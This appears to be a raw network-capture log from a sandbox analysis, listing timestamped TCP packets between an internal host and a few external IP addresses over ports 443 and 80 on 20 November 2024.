                                                                                                            Nov 20, 2024 16:57:51.676846981 CET44349171198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.676903963 CET49171443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:51.677196026 CET49172443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:51.677233934 CET44349172198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.677277088 CET49172443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:51.746633053 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.746701956 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.746714115 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.750627041 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.750638962 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.750679970 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.750689030 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.750720024 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.750756025 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.753645897 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.753660917 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.753705025 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.753711939 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.753735065 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.753758907 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.756786108 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.756794930 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.756853104 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.756860971 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.760660887 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.760710955 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.760715008 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.760732889 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.760768890 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.763643980 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.763654947 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.763693094 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.765719891 CET49171443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:51.765764952 CET44349171198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.766242981 CET49172443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:51.766257048 CET44349172198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.766736984 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.766779900 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.766788006 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.766813040 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.770631075 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.770694971 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.770703077 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.773680925 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.773746014 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.773752928 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.777110100 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.777182102 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.777190924 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.779371977 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.780232906 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.780297995 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.780304909 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.784097910 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.784153938 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.784161091 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.787195921 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.787266970 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.787275076 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.790447950 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.790512085 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.790519953 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.794157982 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.794219971 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.794226885 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.799066067 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.799137115 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.799144983 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.949213982 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.949296951 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.949315071 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.952318907 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.952341080 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.952373028 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.952377081 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.952394962 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.952403069 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.952488899 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.955471992 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.955490112 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.955530882 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.958431005 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.958450079 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.958497047 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.958506107 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.958518982 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.962378979 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.962454081 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.962466002 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.962502003 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.962553024 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.965415955 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.965436935 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.965477943 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.965487003 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.968446016 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.968513966 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.968523026 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.972531080 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.972608089 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.972620010 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.975358963 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.975435972 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.975445986 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.978969097 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.979042053 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.979053020 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.981888056 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.981988907 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.981998920 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.985824108 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.985896111 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.985908031 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.992003918 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.992111921 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.992127895 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.992206097 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.992259979 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.992269993 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.993627071 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.996615887 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.996681929 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.996691942 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.149010897 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.149102926 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:52.149122953 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.151648998 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.151674032 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.151730061 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:52.151740074 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.151751041 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.151762009 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:52.151793957 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:52.154783964 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.154807091 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.154995918 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:52.157332897 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.157352924 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.157404900 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:52.157423019 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.163517952 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.163583994 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.163613081 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:52.163624048 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.163687944 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:52.164952993 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.164977074 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.165029049 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:52.165038109 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.167766094 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.167836905 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:52.167848110 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.171621084 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.171715021 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:52.171724081 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.174860954 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.174954891 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:52.174964905 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.178857088 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.178944111 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:52.178953886 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.181303024 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.181391001 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:52.181400061 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.185239077 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.185334921 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:52.185344934 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.188167095 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.188240051 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:52.188250065 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.191137075 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.191214085 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:52.191225052 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.195359945 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.195439100 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:52.195447922 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.196765900 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.196839094 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:52.196849108 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.349510908 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.349611044 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:52.349626064 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.351748943 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.351769924 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.351788998 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.351818085 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:52.351830006 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.351881981 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:52.354799986 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.354820967 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.354837894 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.354860067 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:52.354871988 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:52.354880095 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.358649015 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.358669996 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.358712912 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:52.358725071 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.358735085 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:52.360915899 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.360980034 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:52.360989094 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.361114025 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.361213923 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:52.391592026 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:53.179629087 CET44349171198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:53.179760933 CET49171443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:53.223829985 CET44349172198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:53.223932028 CET49172443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:53.942492962 CET49171443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:53.942536116 CET44349171198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:53.942961931 CET44349171198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:53.943042040 CET49171443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:53.957250118 CET49172443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:53.957290888 CET44349172198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:53.957811117 CET44349172198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:53.957871914 CET49172443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:54.177464962 CET49171443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:54.219335079 CET44349171198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:54.579256058 CET44349171198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:54.579355955 CET44349171198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:54.579500914 CET49171443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:54.580635071 CET49171443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:54.580635071 CET49171443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:54.581650019 CET4917080192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:54.581897974 CET4917380192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:54.701729059 CET8049170192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:54.701805115 CET4917080192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:54.702061892 CET8049173192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:54.702125072 CET4917380192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:54.702392101 CET4917380192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:54.822135925 CET8049173192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:54.966417074 CET49171443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:54.966458082 CET44349171198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:55.899717093 CET8049173192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:55.899830103 CET4917380192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:00.895512104 CET8049173192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:00.895581007 CET4917380192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:02.722744942 CET49172443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:58:02.722882986 CET4917380192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:08.975142956 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:08.975193977 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:08.975343943 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:08.976959944 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:08.976970911 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:10.281929016 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:10.282061100 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:10.286644936 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:10.286670923 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:10.287739992 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:10.342538118 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:10.387336969 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:10.627104044 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:10.725115061 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:10.725150108 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:10.725836992 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:10.725866079 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:10.726417065 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:10.726428032 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:10.726480007 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:10.726488113 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:10.746701956 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:10.746814013 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:10.746967077 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:10.866533041 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:10.931971073 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:10.932126045 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:10.932163954 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:10.954777002 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:10.954802036 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:10.954823017 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:10.954864025 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:10.954895973 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:10.954909086 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:10.984669924 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:10.984682083 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:10.984715939 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:10.984791994 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:10.984807968 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.011105061 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.011112928 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.011141062 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.011174917 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.011185884 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.011317968 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.138223886 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.138235092 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.138259888 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.138283968 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.138313055 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.155930042 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.155940056 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.155968904 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.155985117 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.155999899 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.168848038 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.168859005 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.168888092 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.168915033 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.168931007 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.182972908 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.182984114 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.183010101 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.183072090 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.183088064 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.201724052 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.201735020 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.201836109 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.201854944 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.205401897 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.217204094 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.217212915 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.217281103 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.217289925 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.249958992 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.250001907 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.250036955 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.250047922 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.250087023 CET49174443192.168.2.22142.215.209.78
